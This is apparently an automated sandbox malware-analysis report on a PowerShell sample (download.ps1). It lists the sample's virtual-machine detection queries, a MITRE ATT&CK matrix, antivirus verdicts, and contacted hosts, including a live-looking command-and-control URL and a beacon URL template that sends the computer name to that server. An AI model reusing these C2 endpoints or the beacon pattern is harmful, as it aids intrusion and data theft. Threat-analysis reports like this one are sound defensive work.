Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5813Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4010Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`SH
Source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine-StampMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps13%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=5270%Avira URL Cloudsafe
http://crl.micro60%Avira URL Cloudsafe
http://cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527100%Avira URL Cloudmalware
http://cmacnnkfbhlcncm.top100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.181.132
truefalse
    		high
    cmacnnkfbhlcncm.top
    		45.61.136.138
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527false
      • Avira URL Cloud: malware
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://crl.microsoftpowershell.exe, 00000000.00000002.2184584754.00000225C4910000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE00F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225ADC18000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schema.org/WebPagepowershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEDB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://0.google.com/powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.google.com/logos/doodles/2024/seasonal-holidays-20powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schema.org/WebPageXpowershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
